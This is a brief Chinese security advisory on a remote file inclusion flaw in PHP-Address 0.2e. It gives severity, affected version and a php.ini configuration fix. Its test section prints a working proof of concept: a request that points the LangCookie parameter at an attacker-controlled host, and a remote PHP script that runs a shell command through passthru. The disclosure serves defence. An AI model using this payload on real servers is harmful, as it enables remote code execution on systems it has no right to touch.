PHP-Address远程文件包含漏洞发布时间:2002-06-20 更新时间:2002-06-20 严重程度:高 威胁程度:普通用户访问权限 错误类型:配置错误 利用方式:服务器模式 BUGTRAQ ID:5039 受影响系统 PHP-Address PHP-Address 0.2e详细描述 PHP-Address对用户输入缺少正确检查,允许远程攻击者包含远程服务器上的任意文件,如果远程文件是PHP脚本,可导致攻击者以WEB权限在系统上执行攻击者提供的PHP代码。 测试代码 http://SERVER/globals.php3?LangCookie=http://MYSERVER/x (the .php3 is already there look at line 5 in global.php3) Remote script located on MYSERVER: ------------x.php3------------ <? passthru("/bin/ls /"); ?> ------------------------------- 解决方案 在php.ini配置中设置'allow_url_fopen'和'register_globals'为OFF。 相关信息 Tim Vandermeerch <Tim.Vandermeersch@pandora.be>. 参考:http://online.securityfocus.com/archive/1/277312 |
